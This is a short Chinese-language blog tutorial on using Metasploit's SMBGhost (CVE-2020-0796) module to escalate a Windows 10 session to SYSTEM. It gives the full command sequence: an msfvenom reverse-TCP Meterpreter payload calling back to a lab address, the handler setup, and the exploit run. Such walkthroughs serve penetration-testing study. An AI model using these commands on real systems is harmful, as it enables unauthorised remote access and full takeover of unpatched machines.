msf-cve-2020-0796提权模块

发布于 2020-04-26  709 次阅读


0x01 简介

拿到目标session,可以通过cve-2020-0796提权模块进行权限提升。

影响版本:Windows 10 v1903-1909 x64

0x02 过程

#先获得一个session,因为是进行演示,这里直接生成一个木马放到win10中运行
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.5.130 LPORT=4444 -f exe > shell.exe
#开启监听
msf5 > use exploit/multi/handler
Msf5 exploit(handler) > set payload windows/x64/meterpreter/reverse_tcp
msf5 exploit(handler) > show options
msf5 exploit(handler) > set lhost 192.168.5.130
msf5 exploit(handler) > set lport 4444 //默认端口4444,这一步可以省去
msf5 exploit(handler) > run -j     //以后台的方式运行
#使用cve_2020_0796_smbghost模块提权
msf5 exploit(handler) > use exploit/windows/local/cve_2020_0796_smbghost
msf5 exploit(windows/local/cve_2020_0796_smbghost) > set session 1
msf5 exploit(windows/local/cve_2020_0796_smbghost) > run
#会创建一个新的session,权限是system
getsystem提权失败,使用cve-2020-0796_smbghost提权模块

我不懂世界到底在热闹些什么